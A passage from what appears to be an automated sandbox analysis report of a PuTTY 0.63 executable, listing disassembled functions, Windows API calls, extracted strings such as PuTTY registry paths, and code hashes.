                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
                            • String ID:
                            • API String ID: 3596705544-0
                            • Opcode ID: 334f284826ee8275a2ba501602893a1e1eecde5e507d168153d268b351fb86fc
                            • Instruction ID: a6bf968ecdd9fd9ecb831d19aa1b31143a079992f9284a05cdd8afe14ea776cb
                            • Opcode Fuzzy Hash: 334f284826ee8275a2ba501602893a1e1eecde5e507d168153d268b351fb86fc
                            • Instruction Fuzzy Hash: B921CB73904318AADF05ABE1FD4ADDE77BCAB08715F50086BF211E6082EE35E2448B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004455AC Relevance: 15.1, APIs: 10, Instructions: 84synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004455C8
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00445666
                            • SetEvent.KERNEL32(?), ref: 00445678
                            • CloseHandle.KERNEL32(?), ref: 0044568A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Event$CloseCreateHandleObjectSingleWait
                            • String ID:
                            • API String ID: 818936268-0
                            • Opcode ID: 16a5a687faf2d401437669605a7c224a9d468da220acc2b823e0f2ff074f4cf0
                            • Instruction ID: 2d2d70f9b46810ac9ff5cbb91ab50e3fa11c3864c17e4d6c0dfbc585808012cf
                            • Opcode Fuzzy Hash: 16a5a687faf2d401437669605a7c224a9d468da220acc2b823e0f2ff074f4cf0
                            • Instruction Fuzzy Hash: C021E771004B08AFEF205F64EC8492BBBE6FB58316F520A7EF44A81522D776E8448B19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044B437 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 356COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID: %02x$..\x11fwd.c$authtype == X11_XDM$local$localhost$unix$unix:%d
                            • API String ID: 3213747228-1204460085
                            • Opcode ID: 214faed630fe43195d6f91422b042dc3b786f37037d6f9538074b4a49a912234
                            • Instruction ID: 6d63eaeb422d3a2023a963b01669eeed8cccfbebd88a3bac6f37d0004792de19
                            • Opcode Fuzzy Hash: 214faed630fe43195d6f91422b042dc3b786f37037d6f9538074b4a49a912234
                            • Instruction Fuzzy Hash: CDC1B371504705EFEB20AF65D88192ABBF4EF04318B20483FF48AD6651EB38E941DB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00445FEB Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 308comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(0046C8B4,00000000,00000001,0046C904,?), ref: 00446028
                            • CoCreateInstance.OLE32(0046C8D4,00000000,00000001,0046C8E4,?), ref: 00446077
                            • _strlen.LIBCMT ref: 00446174
                            • CoCreateInstance.OLE32(0046C8D4,00000000,00000001,0046C8E4,?), ref: 004461CD
                            • _strlen.LIBCMT ref: 00446205
                            • CoCreateInstance.OLE32(0046C8D4,00000000,00000001,0046C8E4,?), ref: 0044625E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CreateInstance$_strlen
                            • String ID: Pageant.exe$Recent Sessions
                            • API String ID: 1547239670-148644000
                            • Opcode ID: ab8656c6939cbcf30946b4fcc8f61f8c4404330cea759f9321ffef0ece5ca7ad
                            • Instruction ID: 5c44d979eb094471b267fbbb8df8b6ab200fde430de6a9a027522bc4334cb18a
                            • Opcode Fuzzy Hash: ab8656c6939cbcf30946b4fcc8f61f8c4404330cea759f9321ffef0ece5ca7ad
                            • Instruction Fuzzy Hash: 6DB1DAB1A00209AFEF00DFE5C884DAEB7B9FF89704B2444AEE505E7251DB799D41CB25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044122E Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 152windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(00000000,Unsupported protocol number found,00000000,00000030), ref: 00441277
                              • Part of subcall function 004407DE: DeleteObject.GDI32(?), ref: 004407F9
                              • Part of subcall function 004407DE: CoUninitialize.OLE32 ref: 00440822
                            • MessageBoxA.USER32(00000000,?,00000000,00000010), ref: 00441340
                            • DeleteMenu.USER32(00000000,00000040,00000000), ref: 004413F8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: DeleteMessage$MenuObjectUninitialize
                            • String ID: %s - %s$%s Error$%s Internal Error$Unable to open connection to%.800s%s$Unsupported protocol number found
                            • API String ID: 3527550427-1847621171
                            • Opcode ID: 799fb720463821c5e597b1719921aca563e2bef557c0d75b1dd284edc83ce840
                            • Instruction ID: 91c220b9814c69ecf87ee74ef6b137f93ba033230b7a1d16824125fa87e88f04
                            • Opcode Fuzzy Hash: 799fb720463821c5e597b1719921aca563e2bef557c0d75b1dd284edc83ce840
                            • Instruction Fuzzy Hash: F6419472804300BEEB216B61FD4AE5A3F6DEB04314B50407BF648661F2DABA5990CB9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D0E9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93windowCOMMON
                            Download Yara Rule
                            APIs
                            • _wctomb_s.LIBCMT ref: 0043D14E
                            • _strlen.LIBCMT ref: 0043D15B
                            • _strlen.LIBCMT ref: 0043D166
                            • _strcat.LIBCMT ref: 0043D18B
                            • SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                            • SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                            • SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                              • Part of subcall function 0040B40A: _strcat.LIBCMT ref: 0040B457
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend$_strcat_strlen$_wctomb_s
                            • String ID: %Y-%m-%d %H:%M:%S
                            • API String ID: 1366823462-819171244
                            • Opcode ID: b654e4ba05f03d3be0d92740d1d243aa7974cdbd63248eb1e0164576a6dff868
                            • Instruction ID: 52d7c710212c89ecb500d7928eaeb86e982d50ac82e04bf07611f02eef4b99a2
                            • Opcode Fuzzy Hash: b654e4ba05f03d3be0d92740d1d243aa7974cdbd63248eb1e0164576a6dff868
                            • Instruction Fuzzy Hash: DD31C476900204BBEB109BA5EC46FAABB79F784714F10003AFE04A71D1DB71BD81CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044963E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 74registryCOMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 0044965F
                            • RegCreateKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449691
                            • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 004496BA
                            • RegCloseKey.ADVAPI32(?,?,00410E52,?,?,?,Default Settings,?,00403911,?,?), ref: 004496C1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Create$Close_strlen
                            • String ID: Default Settings$Software\SimonTatham\PuTTY\Sessions$Unable to create registry keyHKEY_CURRENT_USER\%s$Unable to create registry keyHKEY_CURRENT_USER\%s\%s
                            • API String ID: 367641156-338366038
                            • Opcode ID: bd49674fbce9d6d9044216b5ea4ef43c091be9989045775553295a7d04c859a2
                            • Instruction ID: 4c09f4ddd1c8c60dfd5623c4e6037dcf4929ebb0cac32badd020dc445c46096f
                            • Opcode Fuzzy Hash: bd49674fbce9d6d9044216b5ea4ef43c091be9989045775553295a7d04c859a2
                            • Instruction Fuzzy Hash: DD11B772A04118BBDB117F659C45E9B3B9CDF44364F11403AF808A7292DB39DD4196AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004129B2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcspn$_strlen
                            • String ID: 1.5$PuTTY-Release-0.63$SSH-%s-%s$SSH-2.0-%s$We claim version: %.*s
                            • API String ID: 3583553943-1350810802
                            • Opcode ID: 5e6ccdfdef0304cffe1e369c06da9ee4df542817cf9ef0b29e0fd4c3cb7cc473
                            • Instruction ID: cc384736df05ddbc3e49507be90a32a1275b4a147789e10eb6bc147d33d69a9a
                            • Opcode Fuzzy Hash: 5e6ccdfdef0304cffe1e369c06da9ee4df542817cf9ef0b29e0fd4c3cb7cc473
                            • Instruction Fuzzy Hash: 7A11C6F26553007AD2107B765D47E9B268CDF8071AF24482FF545A6283FABC989042ED
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00455EF8 Relevance: 13.8, APIs: 9, Instructions: 291COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • CompareStringW.KERNEL32(00000000,00000000,00470560,00000001,00470560,00000001,00470B88,00000040,00453A31,00000001,00000014,00000000,00457BC4,00000000,?,0044EFD2), ref: 00455F24
                            • GetLastError.KERNEL32(?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4,00000014,00000014,00408DF6,00000014,00000014), ref: 00455F36
                            • GetCPInfo.KERNEL32(?,0044DC1B,00470B88,00000040,00453A31,00000001,00000014,00000000,00457BC4,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000), ref: 00455FE0
                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 0045606E
                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 004560E7
                            • MultiByteToWideChar.KERNEL32(?,00000009,00408DF6,00000000,00000000,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 00456104
                            • MultiByteToWideChar.KERNEL32(?,00000001,00408DF6,00000000,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 0045617A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                            • String ID:
                            • API String ID: 1773772771-0
                            • Opcode ID: 65fa1d29df0a7bfeef452c784cbba7e90fa284dcdcbd95ca45b73c9a590ab9a1
                            • Instruction ID: 5b4c58025cfc089470775f7ba816c4857ef9c6e7477da0b21a98a27e80f17cc5
                            • Opcode Fuzzy Hash: 65fa1d29df0a7bfeef452c784cbba7e90fa284dcdcbd95ca45b73c9a590ab9a1
                            • Instruction Fuzzy Hash: 0AB1BF31900609AFCF21DF54EC51AAE7BB5AF04712F65002BFC04A72A3DB39C994CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044544C Relevance: 13.6, APIs: 9, Instructions: 101synchronizationfileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00445468
                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004454B7
                            • GetLastError.KERNEL32 ref: 004454C3
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004454F1
                            • GetOverlappedResult.KERNEL32(?,00000000,?,00000000), ref: 004454FC
                            • GetLastError.KERNEL32 ref: 00445508
                            • SetEvent.KERNEL32(?), ref: 0044554A
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0044555B
                            • CloseHandle.KERNEL32(?), ref: 00445577
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorEventLastObjectSingleWait$CloseCreateFileHandleOverlappedReadResult
                            • String ID:
                            • API String ID: 4174623747-0
                            • Opcode ID: 7225e1b297f4fd90b4d7fd1216ac8a9122ab0e2d571c6ae293aa3c3d4540e4cb
                            • Instruction ID: 973d2059e86cdc8de87ea6a41a567adaca75e871bb00206b2259e18ae70d588b
                            • Opcode Fuzzy Hash: 7225e1b297f4fd90b4d7fd1216ac8a9122ab0e2d571c6ae293aa3c3d4540e4cb
                            • Instruction Fuzzy Hash: FC31EB71404B41AFFB205F24DC48777BBE5FF44326F104A3EF49944262D7789888CA19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044894A Relevance: 13.6, APIs: 9, Instructions: 92memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcessId.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004), ref: 0044895F
                            • OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004), ref: 0044896C
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 004489A3
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?), ref: 004489B3
                            • GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 004489D8
                            • CopySid.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004), ref: 004489F0
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 00448A02
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 00448A12
                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 00448A1D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                            • String ID:
                            • API String ID: 621491157-0
                            • Opcode ID: 9332cf7c55524b73097e540cc3860dcdfb4f91a86f338aa6f6527fe60a58e792
                            • Instruction ID: b70982891dd109622ae9b23d150ea353af286a2d228cc89cb089c5161fb77a4f
                            • Opcode Fuzzy Hash: 9332cf7c55524b73097e540cc3860dcdfb4f91a86f338aa6f6527fe60a58e792
                            • Instruction Fuzzy Hash: 8C219371904204BFEB215FA5EC88EAFBBB9EB44741F10007AF505E11A1DF758E409B29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004547EA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 151COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetOEMCP.KERNEL32(00000000,00000000), ref: 00454815
                            • GetACP.KERNEL32(00000000,00000000), ref: 0045482C
                            • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0045487D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info
                            • String ID: @uG$@uG$PvG$PvG
                            • API String ID: 1807457897-1871059007
                            • Opcode ID: 8d99e815a405f24f0d20f40051118f7c6fdd3b8e9c76098e2960fddf062cb993
                            • Instruction ID: f5479fd8d45fea5a8e723d5a6bbf6d7e0d9f551ec1dc7e878e5fcad36a804fcf
                            • Opcode Fuzzy Hash: 8d99e815a405f24f0d20f40051118f7c6fdd3b8e9c76098e2960fddf062cb993
                            • Instruction Fuzzy Hash: 1B5105B080C1909FD710DF38D84526A7BA1AB8531AF64117BDD998F363C33949C9D78D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00429833 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen_strncpy
                            • String ID: %d $%s%02x$gvE
                            • API String ID: 100186321-2632353272
                            • Opcode ID: 249467a1f632bc541fa0b5fa049bca795bd1d6c51149267e4efc4de37655f06d
                            • Instruction ID: d0bc9f89fd477ac4496138bf06b1123e8ed6d8460933010f56b6486c55246fb9
                            • Opcode Fuzzy Hash: 249467a1f632bc541fa0b5fa049bca795bd1d6c51149267e4efc4de37655f06d
                            • Instruction Fuzzy Hash: DE313C72500108BADB21ABB6EC85FDB77ACEF90344F54052FF91187112EA79E944C764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00445C85 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 79COMMON
                            Download Yara Rule
                            APIs
                            • _strcspn.LIBCMT ref: 00445C9D
                            • WinHelpA.USER32(?,00000102,00000000), ref: 00445D1A
                            • WinHelpA.USER32(?,00000000,00000000,00000000), ref: 00445D5A
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$Help_strcat$FileModuleName_strcspn_strncpy
                            • String ID: %s::/%s.html>main$..\windows\winhelp.c$JI(`',`%.*s')$topic[colonpos] != '\0'
                            • API String ID: 215551812-2293147261
                            • Opcode ID: d6852fd11b2fed5f61b891f39962072be71134b2c0c6a4118e6bae1a3a0206f8
                            • Instruction ID: 022f134b0ebc277ea1498da0dad009fd2e49417a272957a72cb268e246d231ed
                            • Opcode Fuzzy Hash: d6852fd11b2fed5f61b891f39962072be71134b2c0c6a4118e6bae1a3a0206f8
                            • Instruction Fuzzy Hash: 3C21C0B2901654BFFB202F51EC8AD6B3B5EEB00395B56403BF90D52162E7396CC0CA9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449D8C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48registryCOMMON
                            Download Yara Rule
                            APIs
                            • _strlen.LIBCMT ref: 00449D96
                            • _strlen.LIBCMT ref: 00449DA0
                              • Part of subcall function 00449B27: _strcat.LIBCMT ref: 00449B2C
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B3D
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B54
                            • RegCreateKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\SshHostKeys,?), ref: 00449DD5
                            • _strlen.LIBCMT ref: 00449DE2
                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00449DF5
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00412E1F,00000000), ref: 00449DFE
                            Strings
                            • Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00449DCB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
